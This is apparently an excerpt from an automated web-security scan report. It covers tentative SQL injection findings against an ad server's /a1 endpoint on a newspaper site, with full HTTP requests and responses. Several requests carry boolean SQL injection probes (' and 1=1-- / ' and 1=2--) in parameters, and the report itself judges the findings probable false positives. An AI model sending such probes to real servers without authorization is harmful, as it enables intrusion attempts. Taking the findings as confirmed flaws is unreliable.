{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aDZlNGRjNShnaWQkNWZlOGQ4ZDAtMDI2MS0xMWUwLTk2ODAtNWY2NmE3MGQzMmE4LHN0JDEyOTE3Njc4MDY1Mjg4NTcsc2kkMjExMDUxLHYkMS4wLGFpZCRtdWhjSzBTMHF5ay0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d2--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type
%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:23:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=ftgh8cp6ftjvu&t=1291767806;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19333


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163h8r1o2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=602f48c4-0261-11e0-b779-0b7c1fdfcc42/B=V.4cA0S0q90-/J=1291767807058589/K=qJHQXaL3_Vc3bVYsBCcV6A/EXP=1291775007/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=602f48c4-0261-11e0-b779-0b7c1fdfcc42&T=19ek3gtk7%2fX%3d1291767807%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2303027397%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI2MDJmNDhjNC0wMjYxLTExZTAtYjc3OS0wYjdjMWZkZmNjNDIiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjk5MDExNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d8CA8B444&U=13uqpesp1%2fN%3dV.4cA0S0q90-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|602f48c4-0261-11e0-b779-0b7c1fdfcc42--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac1.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHZ2ZWZocShnaWQkNjAyZjQ4YzQtMDI2MS0xMWUwLWI3NzktMGI3YzFmZGZjYzQyLHN0JDEyOTE3Njc4MDY5OTAxMTQsc2kkMjExMDUxLHYkMS4wLGFpZCRfR3lEQVVTMHFJdy0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h
...[SNIP]...

1.119. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the visible portion of the two responses below, the only differences are the per-serve ad-selection and tracking values (the M=, A=, L=, J=, K= and B= path segments of the click URL, the MME comment, the fac* serving host, the Set-Cookie value and the Content-Length), which also vary between any two unmodified requests to this ad server; nothing in the pair shows the payload reaching a database, so this finding should be treated as a probable false positive until it is reproduced against a noise baseline.

Request 1

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E'
)%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:30:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=7du40c56ftkd1&t=1291768225;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19302


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ph2bt2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=59588b4a-0262-11e0-bc79-3f914c26f4f7/B=brIcA0S0q98-/J=1291768225085491/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=59588b4a-0262-11e0-bc79-3f914c26f4f7&T=19e0vj2eg%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3572157642%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTU4OGI0YS0wMjYyLTExZTAtYmM3OS0zZjkxNGMyNmY0ZjciIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTAxMzA2OCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d49A9B444&U=13u1adgp2%2fN%3dbrIcA0S0q98-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|59588b4a-0262-11e0-bc79-3f914c26f4f7--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac4.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGloNmIwZShnaWQkNTk1ODhiNGEtMDI2Mi0xMWUwLWJjNzktM2Y5MTRjMjZmNGY3LHN0JDEyOTE3NjgyMjUwMTMwNjgsc2kkMjExMDUxLHYkMS4wLGFpZCRLcm9WcGtTMHFVay0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E'
)%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:30:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=d6sobqp6ftkd1&t=1291768225;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19313


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=1631s5m15/M=600996958.601271502.459798051.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=5991a5ba-0262-11e0-bc7c-8773473a0330/B=2G8cA0S0qUw-/J=1291768225461074/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=1974817592210663262/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=5991a5ba-0262-11e0-bc7c-8773473a0330&T=19euq7usk%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2681437517%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTkxYTViYS0wMjYyLTExZTAtYmM3Yy04NzczNDczYTAzMzAiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTM4NzY1NiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3dEAAAB444&U=13u52avij%2fN%3d2G8cA0S0qUw-%2fC%3d600996958.601271502.459798051.475726551%2fD%3dAP15%2fB%3d1974817592210663262%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|5991a5ba-0262-11e0-bc7c-8773473a0330--><!--TRK:a:1974817592210663262,m:600996958.601271502.459798051.475726551--><!--fac11.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aDdodjg2aChnaWQkNTk5MWE1YmEtMDI2Mi0xMWUwLWJjN2MtODc3MzQ3M2EwMzMwLHN0JDEyOTE3NjgyMjUzODc2NTYsc2kkMjExMDUxLHYkMS4wLGFpZCRTT1cxZmtTMHF1by0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0
...[SNIP]...

1.120. http://open.ad.yieldmanager.net/a1 [sltId2 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The sltId2 parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sltId2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As with 1.119, the visible portion of the two responses below differs only in ad rotation and tracking values (a different M= campaign string, a different fac* serving host, a new Set-Cookie value and a Content-Length that changes by ten bytes); both responses still return the same ad slots for the same creatives, which is the behaviour of an ad server that picks a creative per request, not evidence that sltId2 reaches a SQL query.

Request 1

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d1--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22i
mage%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:25:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=brjll816ftk3i&t=1291767922;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19323


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ptelbu/M=601052417.601382328.486678551.521401551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=a4c20eea-0261-11e0-b32b-8bc683dc0e5f/B=60i0AdFJo9I-/J=1291767922103155/K=0EUsCN3j_fF_fLcH0QO9sA/EXP=1291775122/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=a4c20eea-0261-11e0-b32b-8bc683dc0e5f&T=19evnuhi7%2fX%3d1291767922%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2682159267%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSJhNGMyMGVlYS0wMjYxLTExZTAtYjMyYi04YmM2ODNkYzBlNWYiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzkyMjAzNzAyNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d9B890D4C&U=13uv15qm6%2fN%3d60i0AdFJo9I-%2fC%3d601052417.601382328.486678551.521401551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|a4c20eea-0261-11e0-b32b-8bc683dc0e5f--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.521401551--><!--fac4.cl1.ads.adx.ac4.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
